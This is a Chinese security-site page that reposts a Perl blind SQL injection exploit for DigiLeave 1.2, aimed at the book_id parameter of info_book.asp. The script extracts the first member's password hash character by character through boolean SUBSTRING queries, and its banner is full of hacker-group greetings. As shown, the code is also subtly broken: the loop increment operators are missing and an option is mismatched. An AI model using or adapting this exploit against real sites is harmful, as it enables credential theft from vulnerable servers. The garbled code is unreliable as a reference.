• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit ,其中包含DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit 等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # DigiLeave V1.2Blind SQL Injection Exploit #\n";
print " # (info_book.asp book_id ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # PRODUCT SITE: http://www.digiappz.com #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid book_id value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $book_id = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$book_id = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $book_id, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $book_id, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $book_id = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."info_book.asp?book_id=".$book_id." and (SUBSTRING((SELECT member_password FROM members LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

</div>

您可能想查找下面的文章:

相关文章

  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
  • Debian Sarge Multiple IMAP Server Denial of Service Exploit
  • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
  • Anzio Web Print Object
  • MyBulletinBoard (MyBB)
  • ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
  • DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
  • Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
    • LoveCMS 1.6.2 Final Remote Code Execution Exploit
    • BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
    • WFTPD Pro Server
    • iGaming CMS
    • Ultra Office ActiveX Control Remote Buffer Overflow Exploit
    • Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
    • Joomla Component DT Register Remote SQL injection Vulnerability
    • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有